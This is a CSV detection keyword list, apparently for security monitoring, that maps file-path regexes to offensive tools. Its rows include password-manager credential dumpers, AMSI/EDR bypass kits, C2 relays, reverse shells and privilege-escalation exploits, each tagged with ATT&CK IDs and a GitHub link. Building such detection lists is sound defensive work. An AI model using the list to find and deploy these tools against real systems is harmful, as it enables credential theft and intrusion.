"*\pandora.cpp*",".{0,1000}\\pandora\.cpp.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\pandora.sln*",".{0,1000}\\pandora\.sln.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*\papacat.ps1*",".{0,1000}\\papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\papacat.zip*",".{0,1000}\\papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*\Parasite Invoke.csproj*",".{0,1000}\\Parasite\sInvoke\.csproj.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke.exe*",".{0,1000}\\Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke.pdb*",".{0,1000}\\Parasite\sInvoke\.pdb.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke.sln*",".{0,1000}\\Parasite\sInvoke\.sln.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite Invoke\*",".{0,1000}\\Parasite\sInvoke\\.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\Parasite-Invoke-main*",".{0,1000}\\Parasite\-Invoke\-main.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*\ParsedMalleableData.txt*",".{0,1000}\\ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\parsers\nessus.py*",".{0,1000}\\parsers\\nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\PassTheCert.cs*",".{0,1000}\\PassTheCert\.cs.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*\PassTheCert.exe*",".{0,1000}\\PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\PassTheCert.sln*",".{0,1000}\\PassTheCert\.sln.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*\PassTheChallenge\PassTheChallenge\*",".{0,1000}\\PassTheChallenge\\PassTheChallenge\\.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*\passwarden\app\getCredspasswarden.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\passwarden\app\getCredspasswarden2.h*",".{0,1000}\\passwarden\\app\\getCredspasswarden2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\password.lst*",".{0,1000}\\password\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*\passwordboss\app\getCredspasswordbossapp1.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\passwordboss\app\getCredspasswordbossapp2.h*",".{0,1000}\\passwordboss\\app\\getCredspasswordbossapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\Passwordfiles.txt*",".{0,1000}\\Passwordfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Passwords.docx*",".{0,1000}\\Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\patch_amsi.exe*",".{0,1000}\\patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\patch_etw.exe*",".{0,1000}\\patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\PatchingAPI.cpp*",".{0,1000}\\PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\PatchingAPI.exe*",".{0,1000}\\PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*\path_traversal_dict.txt*",".{0,1000}\\path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*\payload.exe*",".{0,1000}\\payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\payload_placement.exe*",".{0,1000}\\payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\Payloads\*.bin*",".{0,1000}\\Payloads\\.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" "*\payloadtests.py*",".{0,1000}\\payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*\pe2sh.exe*",".{0,1000}\\pe2sh\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*\PEASS-ng*",".{0,1000}\\PEASS\-ng.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*\PerfExec.exe*",".{0,1000}\\PerfExec\.exe.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "*\Perfusion.cpp*",".{0,1000}\\Perfusion\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\Perfusion.exe*",".{0,1000}\\Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\Perfusion.sln*",".{0,1000}\\Perfusion\.sln.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\PerfusionDll.cpp*",".{0,1000}\\PerfusionDll\.cpp.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\PerfusionDll.dll*",".{0,1000}\\PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\PerfusionDll.log*",".{0,1000}\\PerfusionDll\.log.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*\persist.vbs*",".{0,1000}\\persist\.vbs.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\persist_cortana.py*",".{0,1000}\\persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\persist_people.py*",".{0,1000}\\persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\Persiste.ps1*",".{0,1000}\\Persiste\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Persistence.cpp*",".{0,1000}\\Persistence\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\Persistence.exe*",".{0,1000}\\Persistence\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\Persistence.vbs*",".{0,1000}\\Persistence\.vbs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\persistence\elevated\rid_hijack*",".{0,1000}\\persistence\\elevated\\rid_hijack.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*\persistence_demos-master*",".{0,1000}\\persistence_demos\-master.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*\PersistsMalware.cs*",".{0,1000}\\PersistsMalware\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\persit_linux.go*",".{0,1000}\\persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\persit_windows.go*",".{0,1000}\\persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*\petit\pipe\srvsvc*",".{0,1000}\\petit\\pipe\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\petitpotam.py*",".{0,1000}\\petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\PetitPotato.cpp*",".{0,1000}\\PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.log*",".{0,1000}\\PetitPotato\.log.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\petitpotato.obj*",".{0,1000}\\petitpotato\.obj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\petitpotato.pdb*",".{0,1000}\\petitpotato\.pdb.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.sln*",".{0,1000}\\PetitPotato\.sln.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.tlog*",".{0,1000}\\PetitPotato\.tlog.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato.vcxproj*",".{0,1000}\\PetitPotato\.vcxproj.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\petitpotato\x64\*",".{0,1000}\\petitpotato\\x64\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato-1.0.0.zip*",".{0,1000}\\PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PetitPotato-1.0.0\*",".{0,1000}\\PetitPotato\-1\.0\.0\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*\PEzor.cpp*",".{0,1000}\\PEzor\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*\PEzor.hpp*",".{0,1000}\\PEzor\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" 